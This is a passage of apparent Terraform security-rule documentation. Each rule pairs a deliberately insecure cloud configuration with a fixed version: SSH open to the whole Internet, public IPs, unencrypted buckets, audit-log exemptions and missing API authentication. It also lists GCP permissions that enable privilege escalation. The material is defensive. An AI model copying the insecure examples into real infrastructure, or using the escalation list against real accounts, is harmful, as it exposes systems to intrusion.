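        1 for p in permissions
        if p.rsplit(".", 1)[-1].lower() in SENSITIVE_VERBS
    )

def is_sensitive_role(permissions, max_allowed=4):
    """Mirror of the rule: raise an issue when the count exceeds the threshold."""
    return count_sensitive(permissions) > max_allowed

role = [
    "resourcemanager.projects.create",
    "resourcemanager.projects.delete",
    "run.services.create",
    "run.services.delete",
    "run.services.setIamPolicy",
    "run.services.update",
    "run.services.get",
]
print(count_sensitive(role))    # 6
print(is_sensitive_role(role))  # True
```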

Ask Yourself Whether

  • This custom role will be mostly used for read-only purposes.
  • Compliance policies require read-only access.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

To reduce the risks associated with this role after a compromise:

  • Reduce the list of permissions to grant only those that are actually needed.
  • Favor read-only over read-write.

Sensitive Code Example

This custom role grants more than 5 sensitive permissions:

resource "google_project_iam_custom_role" "example" {
  permissions = [ # Sensitive
    "resourcemanager.projects.create", # Sensitive permission
    "resourcemanager.projects.delete", # Sensitive permission
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.create", # Sensitive permission
    "run.services.delete", # Sensitive permission
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.setIamPolicy",  # Sensitive permission
    "run.services.list",
    "run.services.update",  # Sensitive permission
  ]
}

Compliant Solution

This custom role grants fewer than 5 sensitive permissions:

resource "google_project_iam_custom_role" "example" {
  permissions = [
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.create",
    "run.services.delete",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
    "run.services.update",
  ]
}

See

terraform:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.
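The third mechanism can be illustrated with a hedged Terraform sketch (resource names and server references are hypothetical): a database firewall rule spanning the whole IPv4 range makes the server reachable from any public IP.

```terraform
resource "azurerm_sql_firewall_rule" "example" {
  name                = "open-to-internet"
  resource_group_name = azurerm_resource_group.example.name
  server_name         = azurerm_sql_server.example.name
  start_ip_address    = "0.0.0.0"
  end_ip_address      = "255.255.255.255" # Sensitive: allows any public IP
}
```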

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

For AWS:

resource "aws_instance" "example" {
  associate_public_ip_address = true # Sensitive
}
resource "aws_dms_replication_instance" "example" {
  publicly_accessible = true # Sensitive
}

For Azure:

resource "azurerm_postgresql_server" "example"  {
  public_network_access_enabled = true # Sensitive
}
resource "azurerm_kubernetes_cluster" "production" {
  api_server_authorized_ip_ranges = ["176.0.0.0/4"] # Sensitive
  default_node_pool {
    enable_node_public_ip = true # Sensitive
  }
}

For GCP:

resource "google_compute_instance" "example" {
  network_interface {
    network = "default"

    access_config {  # Sensitive
      # Ephemeral public IP
    }
  }
}

Compliant Solution

For AWS:

resource "aws_instance" "example" {
  associate_public_ip_address = false
}
resource "aws_dms_replication_instance" "example" {
  publicly_accessible          = false
}

For Azure:

resource "azurerm_postgresql_server" "example"  {
  public_network_access_enabled = false
}
resource "azurerm_kubernetes_cluster" "production" {
  api_server_authorized_ip_ranges = ["192.168.0.0/16"]
  default_node_pool {
    enable_node_public_ip = false
  }
}

For GCP:

resource "google_compute_instance" "example" {
  network_interface {
    network = google_compute_network.vpc_network_example.name
  }
}

Note that setting network="default" in the network interface block leads to other security problems, such as the removal of logging and Cloud VPN/VPC network peering, and the addition of insecure firewall rules.
A safer alternative is to create a dedicated VPC or subnetwork and enforce security measures on it.

See

terraform:S6405

SSH keys stored and managed in a project’s metadata can be used to access GCP VM instances. By default, GCP automatically deploys project-level SSH keys to VM instances.

Project-level SSH keys can lead to unauthorized access because:

  • Their use prevents fine-grained VM-level access control and makes it difficult to follow the principle of least privilege.
  • Unlike managed access control with OS Login, manual cryptographic key management is error-prone and requires careful attention. For example, if a user leaves a project, their SSH keys should be removed from the metadata to prevent unwanted access.
  • If a project-level SSH key is compromised, all VM instances may be compromised.

Ask Yourself Whether

  • VM instances in a project have different security requirements.
  • Many users with different profiles need access to the VM instances in that project.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Block project-level SSH keys by setting the metadata block-project-ssh-keys key to true.
  • Use OS Login to benefit from managed access control.

Sensitive Code Example

resource "google_compute_instance" "example" { # Sensitive, because metadata.block-project-ssh-keys is not set to true
  name         = "example"
  machine_type = "e2-micro"
  zone         = "us-central1-a"

  network_interface {
    network = "default"

    access_config {
    }
  }
}

Compliant Solution

resource "google_compute_instance" "example" {
  name         = "example"
  machine_type = "e2-micro"
  zone         = "us-central1-a"

  metadata = {
    block-project-ssh-keys = true
  }

  network_interface {
    network = "default"

    access_config {
    }
  }
}
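Alternatively, OS Login can be enabled to delegate SSH access management to IAM. A minimal sketch, assuming OS Login is acceptable for the project (here the enable-oslogin metadata key is set at the instance level):

```terraform
resource "google_compute_instance" "oslogin_example" {
  name         = "example"
  machine_type = "e2-micro"
  zone         = "us-central1-a"

  metadata = {
    # Delegates SSH key management to IAM via OS Login,
    # so project-level SSH keys are not used for this instance.
    enable-oslogin = "TRUE"
  }

  network_interface {
    network = "default"

    access_config {
    }
  }
}
```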

See

terraform:S6400

Granting highly privileged resource rights to users or groups can reduce an organization’s ability to protect against account or service theft. It prevents proper segregation of duties and creates potentially critical attack vectors on affected resources.

If elevated access rights are abused or compromised, both the data that the affected resources work with and their access tracking are at risk.

Ask Yourself Whether

  • This GCP resource is essential to the information system infrastructure.
  • This GCP resource is essential to mission-critical functions.
  • Compliance policies require that administrative privileges for this resource be limited to a small group of individuals.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Grant IAM policies or members a less permissive role: In most cases, granting them read-only privileges is sufficient.

Separate tasks by creating multiple roles that do not use a full access role for day-to-day work.

If the predefined GCP roles do not include the specific permissions you need, create custom IAM roles.

Sensitive Code Example

For an IAM policy setup:

data "google_iam_policy" "admin" {
  binding {
    role = "roles/run.admin" # Sensitive
    members = [
      "user:name@example.com",
    ]
  }
}

resource "google_cloud_run_service_iam_policy" "policy" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  policy_data = data.google_iam_policy.admin.policy_data
}

For an IAM policy binding:

resource "google_cloud_run_service_iam_binding" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  role = "roles/run.admin" # Sensitive
  members = [
    "user:name@example.com",
  ]
}

For adding a member to a policy:

resource "google_cloud_run_service_iam_member" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  role = "roles/run.admin" # Sensitive
  member = "user:name@example.com"
}

Compliant Solution

For an IAM policy setup:

data "google_iam_policy" "admin" {
  binding {
    role = "roles/viewer"
    members = [
      "user:name@example.com",
    ]
  }
}

resource "google_cloud_run_service_iam_policy" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  policy_data = data.google_iam_policy.admin.policy_data
}

For an IAM policy binding:

resource "google_cloud_run_service_iam_binding" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  role = "roles/viewer"
  members = [
    "user:name@example.com",
  ]
}

For adding a member to a policy:

resource "google_cloud_run_service_iam_member" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  role = "roles/viewer"
  member = "user:name@example.com"
}

See

terraform:S6245

Server-side encryption (SSE) encrypts an object (not its metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way objects are accessed: as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk theft, improper disposal of disks, and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply with regulations, such as HIPAA or PCI DSS, or other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

resource "aws_s3_bucket" "example" { # Sensitive
  bucket = "example"
}

Compliant Solution

Server-side encryption with Amazon S3-managed keys is used for AWS provider version 3 or below:

resource "aws_s3_bucket" "example" {
  bucket = "example"

  server_side_encryption_configuration {
    rule {
      apply_server_side_encryption_by_default {
        sse_algorithm = "AES256"
      }
    }
  }
}

Server-side encryption with Amazon S3-managed keys is used for AWS provider version 4 or above:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_server_side_encryption_configuration" "example" {
  bucket = aws_s3_bucket.example.bucket

  rule {
    apply_server_side_encryption_by_default {
      sse_algorithm = "AES256"
    }
  }
}
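If key management must remain under the customer's control, SSE-KMS can be used instead of SSE-S3. A sketch for AWS provider version 4 or above, assuming an existing KMS key resource named aws_kms_key.example:

```terraform
resource "aws_s3_bucket_server_side_encryption_configuration" "kms_example" {
  bucket = aws_s3_bucket.example.bucket

  rule {
    apply_server_side_encryption_by_default {
      # Encrypt objects with a customer-managed KMS key
      # instead of the S3-managed default key.
      sse_algorithm     = "aws:kms"
      kms_master_key_id = aws_kms_key.example.arn
    }
  }
}
```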

See

terraform:S6402

Domain Name Systems (DNS) are vulnerable by default to various types of attacks.

One of the biggest risks is DNS cache poisoning, which occurs when a DNS resolver accepts spoofed DNS data, caches the malicious records, and later serves them in response to legitimate DNS lookups. This attack typically relies on the attacker’s man-in-the-middle (MITM) position on the network and can be used to redirect users from an intended website to a malicious one.

To prevent these vulnerabilities, Domain Name System Security Extensions (DNSSEC) ensure the integrity and authenticity of DNS data by digitally signing DNS zones.

The public key of a DNS zone used to validate signatures can be trusted as DNSSEC is based on the following chain of trust:

  • The parent DNS zone adds a "fingerprint" of the public key of the child zone in a "DS record".
  • The parent DNS zone signs it with its own private key.
  • And this process continues until the root zone.

Ask Yourself Whether

The parent DNS zone (likely managed by the DNS registrar of the domain name) supports DNSSEC and

  • The DNS zone is public (contains data such as public reachable IP addresses).

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to use DNSSEC when creating private and public DNS zones.

Private DNS zones cannot be queried on the Internet and provide DNS name resolution for private networks. The risk of MITM attacks on these networks might be considered low, so implementing DNSSEC there is still recommended, but with lower priority.

Note: Choose a robust signing algorithm when setting up DNSSEC, such as rsasha256. The insecure rsasha1 algorithm should no longer be used.

Sensitive Code Example

resource "google_dns_managed_zone" "example" { # Sensitive: dnssec_config is missing
  name     = "foobar"
  dns_name = "foo.bar."
}

Compliant Solution

resource "google_dns_managed_zone" "example" {
  name     = "foobar"
  dns_name = "foo.bar."

  dnssec_config {
    default_key_specs {
      algorithm = "rsasha256"
    }
  }
}

See

terraform:S6401

The likelihood of security incidents increases when cryptographic keys are used for a long time. Thus, to strengthen the data protection it’s recommended to rotate the symmetric keys created with the Google Cloud Key Management Service (KMS) automatically and periodically. Note that it’s not possible in GCP KMS to rotate asymmetric keys automatically.

Ask Yourself Whether

  • The cryptographic key is a symmetric key.
  • The application requires compliance with some security standards like PCI-DSS.

Recommended Secure Coding Practices

It’s recommended to rotate keys automatically and regularly. The shorter the rotation period, the less data can be decrypted by an attacker if a key is compromised. The rotation period therefore usually depends on the amount of data encrypted with the key, or on other requirements such as compliance with security standards. In general, a period of 90 days is a reasonable default.

Sensitive Code Example

resource "google_kms_crypto_key" "noncompliant-key" { # Sensitive: no rotation period is defined
  name            = "example"
  key_ring        = google_kms_key_ring.keyring.id
}

Compliant Solution

resource "google_kms_crypto_key" "compliant-key" {
  name            = "example"
  key_ring        = google_kms_key_ring.keyring.id
  rotation_period = "7776000s" # 90 days
}

See

terraform:S6408

Creating custom roles that allow privilege escalation can allow attackers to maliciously exploit an organization’s cloud resources.

Certain GCP permissions allow impersonation of one or more privileged principals within a GCP infrastructure.
To prevent privilege escalation after an account has been compromised, proactively follow GCP Security Insights and ensure that custom roles contain as few privileges as possible that allow direct or indirect impersonation.

For example, privileges like deploymentmanager.deployments.create allow impersonation of service accounts, even though the name does not suggest it.
Other privileges like setIamPolicy, which are more explicit, directly allow their holder to extend their privileges.

After gaining a foothold in the target infrastructure, sophisticated attackers typically map their newfound roles to understand what is exploitable.

The riskiest privileges are either:

  • At the infrastructure level: privileges to perform project, folder, or organization-wide administrative tasks.
  • At the resource level: privileges to perform resource-wide administrative tasks.

In either case, the following privileges should be avoided or granted only with caution:

  • ..setIamPolicy
  • cloudbuilds.builds.create
  • cloudfunctions.functions.create
  • cloudfunctions.functions.update
  • cloudscheduler.jobs.create
  • composer.environments.create
  • compute.instances.create
  • dataflow.jobs.create
  • dataproc.clusters.create
  • deploymentmanager.deployments.create
  • iam.roles.update
  • iam.serviceAccountKeys.create
  • iam.serviceAccounts.actAs
  • iam.serviceAccounts.getAccessToken
  • iam.serviceAccounts.getOpenIdToken
  • iam.serviceAccounts.implicitDelegation
  • iam.serviceAccounts.signBlob
  • iam.serviceAccounts.signJwt
  • orgpolicy.policy.set
  • run.services.create
  • serviceusage.apiKeys.create
  • serviceusage.apiKeys.list
  • storage.hmacKeys.create

Ask Yourself Whether

  • This role requires impersonation to perform specific tasks with different privileges.
  • This custom role is intended for a small group of administrators.

There is a risk if you answered no to these questions.

Recommended Secure Coding Practices

Use a permission that does not allow privilege escalation.

Sensitive Code Example

Lightweight custom role intended for a developer:

resource "google_organization_iam_custom_role" "example" {
  permissions = [
    "iam.serviceAccounts.getAccessToken",     # Sensitive
    "iam.serviceAccounts.getOpenIdToken",     # Sensitive
    "iam.serviceAccounts.actAs",              # Sensitive
    "iam.serviceAccounts.implicitDelegation", # Sensitive
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.create",
    "run.services.delete",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
    "run.services.update",
  ]
}

Lightweight custom role intended for a read-only user:

resource "google_project_iam_custom_role" "example" {
  permissions = [
    "iam.serviceAccountKeys.create",        # Sensitive
    "iam.serviceAccountKeys.get",           # Sensitive
    "deploymentmanager.deployments.create", # Sensitive
    "cloudbuild.builds.create",             # Sensitive
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
  ]
}

Compliant Solution

Lightweight custom role intended for a developer:

resource "google_project_iam_custom_role" "example" {
  permissions = [
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.create",
    "run.services.delete",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
    "run.services.update",
  ]
}

Lightweight custom role intended for a read-only user:

resource "google_project_iam_custom_role" "example" {
  permissions = [
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
  ]
}

See

terraform:S6407

App Engine supports encryption in transit through TLS. As soon as the app is deployed, it can be requested using appspot.com domains or custom domains. By default, endpoints accept both clear-text and encrypted traffic. When communication isn’t encrypted, there is a risk that an attacker could intercept it and read confidential information.

When creating an App Engine app, request handlers can be set with different security levels for encryption:

  • SECURE_NEVER: only HTTP requests are allowed (HTTPS requests are redirected to HTTP).
  • SECURE_OPTIONAL and SECURE_DEFAULT: both HTTP and HTTPS requests are allowed.
  • SECURE_ALWAYS: only HTTPS requests are allowed (HTTP requests are redirected to HTTPS).

Ask Yourself Whether

  • The handler serves confidential data in HTTP responses.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended for App Engine handlers to require TLS for all traffic. It can be achieved by setting the security level to SECURE_ALWAYS.

Sensitive Code Example

SECURE_DEFAULT, SECURE_NEVER and SECURE_OPTIONAL are sensitive TLS security levels:

resource "google_app_engine_standard_app_version" "example" {
  version_id = "v1"
  service    = "default"
  runtime    = "nodejs"

  handlers {
    url_regex                   = ".*"
    redirect_http_response_code = "REDIRECT_HTTP_RESPONSE_CODE_301"
    security_level              = "SECURE_OPTIONAL" # Sensitive
    script {
      script_path = "auto"
    }
  }
}

Compliant Solution

Force the use of TLS for the handler by setting the security level to SECURE_ALWAYS:

resource "google_app_engine_standard_app_version" "example" {
  version_id = "v1"
  service    = "default"
  runtime    = "nodejs"

  handlers {
    url_regex                   = ".*"
    redirect_http_response_code = "REDIRECT_HTTP_RESPONSE_CODE_301"
    security_level              = "SECURE_ALWAYS"
    script {
      script_path = "auto"
    }
  }
}

See

terraform:S6409

Enabling Legacy Authorization, Attribute-Based Access Control (ABAC), on Google Kubernetes Engine resources can reduce an organization’s ability to protect itself against access controls being compromised.

For Kubernetes, Attribute-Based Access Control has been superseded by Role-Based Access Control. ABAC is not under active development anymore and thus should be avoided.

Ask Yourself Whether

  • This resource is essential for the information system infrastructure.
  • This resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be enforced through the use of Role-Based Access Control.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Unless you are relying on ABAC, leave it disabled.

Sensitive Code Example

For Google Kubernetes Engine:

resource "google_container_cluster" "example" {
  enable_legacy_abac = true # Sensitive
}

Compliant Solution

For Google Kubernetes Engine:

resource "google_container_cluster" "example" {
  enable_legacy_abac = false
}

See

terraform:S6321

Why is this an issue?

Cloud platforms such as AWS, Azure, or GCP support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

An ingress rule allowing all inbound SSH traffic for AWS:

resource "aws_security_group" "noncompliant" {
  name        = "allow_ssh_noncompliant"
  description = "allow_ssh_noncompliant"
  vpc_id      = aws_vpc.main.id

  ingress {
    description      = "SSH rule"
    from_port        = 22
    to_port          = 22
    protocol         = "tcp"
    cidr_blocks      = ["0.0.0.0/0"]  # Noncompliant
  }
}

A security rule allowing all inbound SSH traffic for Azure:

resource "azurerm_network_security_rule" "noncompliant" {
  priority                    = 100
  direction                   = "Inbound"
  access                      = "Allow"
  protocol                    = "Tcp"
  source_port_range           = "*"
  destination_port_range      = "22"
  source_address_prefix       = "*"  # Noncompliant
  destination_address_prefix  = "*"
}

A firewall rule allowing all inbound SSH traffic for GCP:

resource "google_compute_firewall" "noncompliant" {
  network = google_compute_network.default.name

  allow {
    protocol = "tcp"
    ports    = ["22"]
  }

  source_ranges = ["0.0.0.0/0"]  # Noncompliant
}

Compliant solution

An ingress rule allowing inbound SSH traffic from specific IP addresses for AWS:

resource "aws_security_group" "compliant" {
  name        = "allow_ssh_compliant"
  description = "allow_ssh_compliant"
  vpc_id      = aws_vpc.main.id

  ingress {
    description      = "SSH rule"
    from_port        = 22
    to_port          = 22
    protocol         = "tcp"
    cidr_blocks      = ["1.2.3.0/24"]
  }
}

A security rule allowing inbound SSH traffic from specific IP addresses for Azure:

resource "azurerm_network_security_rule" "compliant" {
  priority                    = 100
  direction                   = "Inbound"
  access                      = "Allow"
  protocol                    = "Tcp"
  source_port_range           = "*"
  destination_port_range      = "22"
  source_address_prefix       = "1.2.3.0/24"
  destination_address_prefix  = "*"
}

A firewall rule allowing inbound SSH traffic from specific IP addresses for GCP:

resource "google_compute_firewall" "compliant" {
  network = google_compute_network.default.name

  allow {
    protocol = "tcp"
    ports    = ["22"]
  }

  source_ranges = ["10.0.0.1/32"]
}

Resources

Documentation

Standards

terraform:S6364

A short backup retention duration can reduce an organization’s ability to re-establish service in case of a security incident.

Data backups allow an organization to overcome corruption or unavailability of data by recovering as efficiently as possible from a security incident.

Backup retention duration, coverage, and backup locations are essential criteria regarding functional continuity.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require this component to be backed up for a specific amount of time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Increase the backup retention period to an amount of time sufficient to restore service in case of an incident.

Sensitive Code Example

For Amazon Relational Database Service clusters and instances:

resource "aws_db_instance" "example" {
  backup_retention_period = 2 # Sensitive
}

For Azure Cosmos DB accounts:

resource "azurerm_cosmosdb_account" "example" {
  backup {
    type = "Periodic"
    retention_in_hours = 8 # Sensitive
  }
}

Compliant Solution

For Amazon Relational Database Service clusters and instances:

resource "aws_db_instance" "example" {
  backup_retention_period = 5
}
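The same argument applies to Aurora clusters; a sketch (backup_retention_period is also supported on aws_rds_cluster):

```terraform
resource "aws_rds_cluster" "example" {
  # Retain automated backups long enough to be able to
  # restore service after an incident.
  backup_retention_period = 5
}
```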

For Azure Cosmos DB accounts:

resource "azurerm_cosmosdb_account" "example" {
  backup {
    type = "Periodic"
    retention_in_hours = 300
  }
}
terraform:S6281

By default, S3 buckets are private: only the bucket owner can access them.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies from being set on an S3 bucket, the following settings can be configured:

  • BlockPublicAcls: whether to block new public ACLs from being set on the S3 bucket.
  • IgnorePublicAcls: whether to ignore existing public ACLs set on the S3 bucket.
  • BlockPublicPolicy: whether to block new public policies from being set on the S3 bucket.
  • RestrictPublicBuckets: whether to restrict access granted by existing public policies to principals within the bucket owner’s account.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, CSS, etc.).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • BlockPublicAcls to true to block new attempts to set public ACLs.
  • IgnorePublicAcls to true to block existing public ACLs.
  • BlockPublicPolicy to true to block new attempts to set public policies.
  • RestrictPublicBuckets to true to restrict existing public policies.

Sensitive Code Example

By default, when not set, the aws_s3_bucket_public_access_block is fully deactivated (nothing is blocked):

resource "aws_s3_bucket" "example" { # Sensitive: no Public Access Block defined for this bucket
  bucket = "example"
}

This aws_s3_bucket_public_access_block allows public ACLs to be set:

resource "aws_s3_bucket" "example" {  # Sensitive
  bucket = "examplename"
}

resource "aws_s3_bucket_public_access_block" "example-public-access-block" {
  bucket = aws_s3_bucket.example.id

  block_public_acls       = false # should be true
  block_public_policy     = true
  ignore_public_acls      = true
  restrict_public_buckets = true
}

Compliant Solution

This aws_s3_bucket_public_access_block blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_public_access_block" "example-public-access-block" {
  bucket = aws_s3_bucket.example.id

  block_public_acls       = true
  block_public_policy     = true
  ignore_public_acls      = true
  restrict_public_buckets = true
}
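The same four settings can also be enforced account-wide, which covers buckets whose own block is missing. A sketch (this complements, rather than replaces, per-bucket blocks):

```terraform
resource "aws_s3_account_public_access_block" "example" {
  # Applies to every S3 bucket in the account.
  block_public_acls       = true
  block_public_policy     = true
  ignore_public_acls      = true
  restrict_public_buckets = true
}
```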

See

terraform:S6414

The Google Cloud audit logs service records administrative activities and accesses to Google Cloud resources of the project. It is important to enable audit logs to be able to investigate malicious activities in the event of a security incident.

Some project members may be exempted from having their activities recorded in the Google Cloud audit log service, creating a blind spot and reducing the capacity to investigate future security events.

Ask Yourself Whether

  • The members exempted from having their activity logged have high privileges.
  • Compliance rules require that audit logging be activated for all members.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to have a consistent audit logging policy for all project members and therefore not to create logging exemptions for certain members.

Sensitive Code Example

resource "google_project_iam_audit_config" "example" {
  project = data.google_project.project.id
  service = "allServices"
  audit_log_config {
    log_type = "ADMIN_READ"
    exempted_members = [ # Sensitive
      "user:rogue.administrator@gmail.com",
    ]
  }
}

Compliant Solution

resource "google_project_iam_audit_config" "example" {
  project = data.google_project.project.id
  service = "allServices"
  audit_log_config {
    log_type = "ADMIN_READ"
  }
}

See

terraform:S6378

Disabling Managed Identities can reduce an organization’s ability to protect itself against configuration faults and credentials leaks.

Authenticating to an Azure resource via managed identities relies solely on an API call with a non-secret token. The process is internal to Azure: the secrets Azure uses are not even accessible to end-users.

In typical scenarios without managed identities, the use of credentials can lead to mistakenly leaving them in code bases. In addition, configuration faults may also happen when storing these values or assigning them permissions.

By transparently taking care of the Azure Active Directory authentication, Managed Identities allow getting rid of day-to-day credentials management.

Ask Yourself Whether

The resource:

  • Needs to authenticate to Azure resources that support Azure Active Directory (AAD).
  • Uses a different Access Control system that doesn’t guarantee the same security controls as AAD, or no Access Control system at all.

There is a risk if you answered yes to all of those questions.

Recommended Secure Coding Practices

Enable the Managed Identities capabilities of this Azure resource. If supported, use a System-Assigned managed identity, as:

  • It cannot be shared across resources.
  • Its life cycle is deeply tied to the life cycle of its Azure resource.
  • It provides a unique independent identity.

Alternatively, User-Assigned Managed Identities can also be used but don’t guarantee the properties listed above.

Sensitive Code Example

For typical identity blocks:

resource "azurerm_api_management" "example" { # Sensitive, the identity block is missing
  name           = "example"
  publisher_name = "company"
}

For connections between Kusto Clusters and Azure Data Factory:

resource "azurerm_data_factory_linked_service_kusto" "example" {
  name                 = "example"
  use_managed_identity = false # Sensitive
}

Compliant Solution

For typical identity blocks:

resource "azurerm_api_management" "example" {
  name           = "example"
  publisher_name = "company"

  identity {
    type = "SystemAssigned"
  }
}

For connections between Kusto Clusters and Azure Data Factory:

resource "azurerm_data_factory_linked_service_kusto" "example" {
  name                 = "example"
  use_managed_identity = true
}
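When a system-assigned identity is not an option, a user-assigned identity can be attached instead. A sketch, assuming an existing azurerm_user_assigned_identity resource named example:

```terraform
resource "azurerm_api_management" "example_user_assigned" {
  name           = "example"
  publisher_name = "company"

  identity {
    # User-assigned identities can be shared across resources and
    # outlive them, so prefer SystemAssigned when possible.
    type         = "UserAssigned"
    identity_ids = [azurerm_user_assigned_identity.example.id]
  }
}
```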

See

terraform:S6410

Why is this an issue?

TLS configuration of Google Cloud load balancers is defined through SSL policies. There are three managed profiles to choose from: COMPATIBLE (default), MODERN and RESTRICTED:

  • The RESTRICTED profile relies only on secure cipher suites and should be used by applications that must comply with the highest security standards.
  • The MODERN profile includes additional cipher suites with security weaknesses, such as the use of the SHA1 algorithm for signing.
  • The COMPATIBLE profile offers the most common cipher suites and thus broader compatibility. Some of these use the SHA1 or 3DES algorithms, which are considered weak. This profile also includes cipher suites that rely on obsolete key-exchange mechanisms that don’t provide forward secrecy (https://en.wikipedia.org/wiki/Forward_secrecy).

Noncompliant code example

resource "google_compute_ssl_policy" "example" {
  name            = "example"
  min_tls_version = "TLS_1_2"
  profile         = "COMPATIBLE" # Noncompliant
}

Compliant solution

resource "google_compute_ssl_policy" "example" {
  name            = "example"
  min_tls_version = "TLS_1_2"
  profile         = "RESTRICTED"
}
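
If the policy is managed with the gcloud CLI rather than Terraform, an equivalent restricted policy can be created as follows (the policy name is a placeholder):

# Create an SSL policy that uses the RESTRICTED profile,
# with TLS 1.2 as the minimum version.
```shell
gcloud compute ssl-policies create example \
    --profile RESTRICTED \
    --min-tls-version 1.2
```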

Resources

terraform:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is used, attackers have the opportunity to attempt attacks against the underlying API.
This means attacks both on the functionality provided by the API and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independent OIDC provider, glued to the infrastructure with a Lambda authorizer.
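
As a sketch of the COGNITO_USER_POOLS option outside Terraform, the AWS CLI can attach a Cognito authorizer to a method. All identifiers below are hypothetical placeholders:

```shell
# Require a Cognito user pool authorizer on a GET method.
# The REST API, resource, and authorizer IDs are placeholders.
aws apigateway put-method \
    --rest-api-id a1b2c3d4e5 \
    --resource-id f6g7h8 \
    --http-method GET \
    --authorization-type COGNITO_USER_POOLS \
    --authorizer-id abcde1
```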

Sensitive Code Example

A public API that doesn’t have access control implemented:

resource "aws_api_gateway_method" "noncompliantapi" {
  authorization = "NONE" # Sensitive
  http_method   = "GET"
}

Compliant Solution

An API that implements AWS IAM permissions:

